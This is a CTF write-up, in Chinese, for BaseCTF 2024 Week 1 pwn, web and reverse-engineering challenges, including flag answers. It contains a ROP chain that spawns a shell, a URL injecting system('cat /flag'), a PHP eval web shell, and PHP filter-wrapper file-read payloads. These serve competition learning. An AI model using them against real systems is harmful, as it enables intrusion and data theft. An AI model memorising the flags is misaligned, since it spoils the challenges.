payload = b"a" * (0xA + 0X8) + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
p.sendline(payload)
p.sendline(b"cat${IFS}flag")
p.interactive()

WEB

Week1 HTTP 是什么呀

POST /?basectf=we1c%2500me HTTP/1.1
Host: challenge.basectf.fun:27260
User-Agent: Base
Referer: Base
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
X-Forwarded-For: 127.0.0.1
Cookie: c00k13=i can't eat it

Base=fl%40g

HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Thu, 15 Aug 2024 01:29:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.27
Location: success.php?flag=QmFzZUNURntmMzhiNmZlYi03Y2Y1LTQ4OGItYmFhMC00MjM4ZTY1NTFmOWN9Cg==
Content-Length: 0

BaseCTF{f38b6feb-7cf5-488b-baa0-4238e6551f9c}

Week1 喵喵喵´•ﻌ•`

http://challenge.basectf.fun:43684/?DT=system(%22cat%20/flag%22);

BaseCTF{59a33491-f8df-4d7c-9049-97250c8f6a71}

Week1 md5绕过欸

POST /?name[]=3&name2[]=4 HTTP/1.1
Host: challenge.basectf.fun:47385
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://challenge.basectf.fun:47385
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://challenge.basectf.fun:47385/name[]=3&name2[]=4
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password[]=1&password2[]=2

Week1 A Dark Room

注释

FLAG: BaseCTF{29831c5f-fb52-402e-ae13-bbd246dbc796}

Week1 upload

蚁剑连上后得到flag

1	<?php @eval($_POST['pass']);?>

BaseCTF{4d611585-3df3-4f96-b470-f3f210d19a20}

Week1 Aura 酱的礼物

首先通过伪协议绕过，然后通过.截断strpos比较，使其判定为真，然后将jasmineaura.github.io.作为三层子域名在自己的网站服务器上搭建网页显示已经收到Kengwang的礼物啦

POST / HTTP/1.1
Host: challenge.basectf.fun:42619
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Cookie: SESS_COOKIE_KUBEPI=cef4a230-396d-4d15-a1c1-1504056be7c7

pen=data%3A%2F%2Ftext%2Fplain%2CAura&challenge=http%3A%2F%2Fjasmineaura.github.io.主域名.域名后缀&gift=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php

Base64解码得到flag

1	PD9waHAgLy8gQmFzZUNURntkM2EzMWUyNC0yYmE4LTRjMDUtYTRhMi01ZmE1YzM5NTNjMGJ9ICBBdXJhIOmFseacieaLv+WIsOS4gOihgOWQl++8nwo=

BaseCTF{d3a31e24-2ba8-4c05-a4a2-5fa5c3953c0b}

RE

Week1 You are good at IDA

shift+F12找到三段flag拼凑得到最终flag

BaseCTF{Y0u_4Re_900d_47_id4}

Week1 UPX mini

C:\Users\Downloads\upx-4.0.1-win64\upx-4.0.1-win64>upx -d UPXmini.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2022
UPX 4.0.1       Markus Oberhumer, Laszlo Molnar & John Reiser   Nov 16th 2022

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     60222 <-     43326   71.94%    win64/pe     UPXmini.exe

Unpacked 1 file.

得到字符串QmFzZUNURntIYXYzX0BfZzBvZF90MW0zISEhfQ==，Base64解密后得到flag

BaseCTF{Hav3_@_g0od_t1m3!!!}

Week1 Ez Xor

打断点动态调试得到内存中的v14和Str，逆向encrypt()函数逻辑得到flag

def decrypt(key, enc, length):
    decrypted = []
    for i in range(length):
        decrypted.append(enc[i] ^ key[length - i - 1])
    return decrypted


key = [
    0x58, 0x6E, 0x70, 0x5B, 0x6B, 0x77, 0x5E, 0x68,
    0x7A, 0x51, 0x65, 0x79, 0x54, 0x62, 0x7C, 0x57,
    0x7F, 0x63, 0x4A, 0x7C, 0x66, 0x4D, 0x79, 0x65,
    0x40, 0x76, 0x68, 0x43
]
enc = [
    1, 9, 5, 37, 38, 45, 11, 29, 36, 122,
    49, 32, 30, 73, 61, 103, 77, 80, 8, 37,
    46, 110, 5, 52, 34, 64, 59, 37
]

length = 28

print("flag: ", ''.join(chr(x) for x in decrypt(key, enc, length)))

BaseCTF{X0R_I5_345Y_F0r_y0U}

Week1 ez_maze

IDA报错

String table size 1298093129 is incorrect, maximum possible value is 29726. Do you want to continue with the new value?

Corrupt COFF symbol table: too many aux records for COFF symbol #1168.

使用Binary Ninja可以正常解析程序

sub_401840()
puts(_Buffer: "Can you walk the maze???")
puts(_Buffer: "Take the shortest path to the fi…")
puts(_Buffer: "Show your time!!!")
void s
__builtin_memset(s: &s, c: 0, n: 0x20)
int16_t* rdi
*rdi = 0
rdi[1].b = 0
scanf(_Format: "%34s", &s)
int32_t var_1c = 0
int32_t var_20 = 0
int64_t rax_8
while (true)
    if (*(&s + sx.q(var_20)) == 0)
        puts(_Buffer: "You didn't reach the end.")
        rax_8 = 0
        break
    uint32_t rax_7 = zx.d(*(&s + sx.q(var_20)))
    if (rax_7 == 0x64)
        if (var_1c % 0xf == 0xe)
            puts(_Buffer: "Invalid move: out of bounds!")
            rax_8 = 0xffffffff
            break
        var_1c = var_1c + 1
    else
        if (rax_7 == 0x77)
            if (var_1c <= 0xe)
                puts(_Buffer: "Invalid move: out of bounds!")
                rax_8 = 0xffffffff
                break
            var_1c = var_1c - 0xf
        if (rax_7 == 0x73)
            if (var_1c > 0xd1)
                puts(_Buffer: "Invalid move: out of bounds!")
                rax_8 = 0xffffffff
                break
            var_1c = var_1c + 0xf
        if ((rax_7 <= 0x64 && rax_7 != 0x61) || (rax_7 > 0x64 && rax_7 != 0x73 && rax_7 != 0x77))
            puts(_Buffer: "Invalid input!")
            rax_8 = 0xffffffff
            break
        if (rax_7 == 0x61)
            if (var_1c % 0xf == 0)
                puts(_Buffer: "Invalid move: out of bounds!")
                rax_8 = 0xffffffff
                break
            var_1c = var_1c - 1
    if (*(sx.q(var_1c) + "x$$$$$$$$$$$$$$&&&&&&$$$$$$$$$&$…") == 0x24)
        puts(_Buffer: "Invalid move: hit a wall!")
        rax_8 = 0xffffffff
        break
    if (*(sx.q(var_1c) + "x$$$$$$$$$$$$$$&&&&&&$$$$$$$$$&$…") == 0x79)
        puts(_Buffer: "You win!")
        puts(_Buffer: "plz BaseCTF{lower.MD5{your path}…")
        rax_8 = 0
        break
    var_20 = var_20 + 1
return rax_8

根据向右移动时 if (var_1c % 0xf == 0xe) 检查当前位置是否为行的最后一列可推知题目迷宫是一个 15 行 x 15 列的方形迷宫

x$$$$$$$$$$$$$$
&&&&&&$$$$$$$$$
&$&$$&$$&&&&&$$
&$&$$$&&$$$$&$$
&$$$&&&$$$$$&$$
&$$$&$&&$&$$$$$
&$$$&$&$$&&&$$$
&&&&&$&&&&$&$$$
$$$$$$&&&&&&$$$
$$$$$$&$$$$$$$$
$$$&&&&$$&&&$$$
$$$&&&&&&&$$$$$
$$$$$$$$$&$$&$$
$$$$$$$$$&$&$$$
$$$$$$&&&&&&&&y

故路径为sssssssddddwwwddsssssssdddsssddddd BaseCTF{131b7d6e60e8a34cb01801ae8de07efe}

Week1 BasePlus

def unpack_string(encrypted):
    lookup_table = '/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC'
    unpacked = ""

    xor_transform = ''.join(chr(ord(char) ^ 14) for char in encrypted)

    for position in range(0, len(xor_transform), 4):
        index1 = lookup_table.index(xor_transform[position])
        index2 = lookup_table.index(xor_transform[position + 1])
        index3 = lookup_table.index(xor_transform[position + 2])
        index4 = lookup_table.index(xor_transform[position + 3])

        first_byte = (index1 << 2) | (index2 >> 4)
        second_byte = ((index2 & 15) << 4) | (index3 >> 2)
        third_byte = ((index3 & 3) << 6) | index4

        unpacked += chr(first_byte) + chr(second_byte) + chr(third_byte)

    return unpacked.split('\0', 1)[0]


encrypted_input = "lvfzBiZiOw7<lhF8dDOfEbmI]i@bdcZfEc^z>aD!"
decoded_output = unpack_string(encrypted_input)
print("Flag:", decoded_output)

BaseCTF{BA5e_DEcoD1N6_sEcr3t}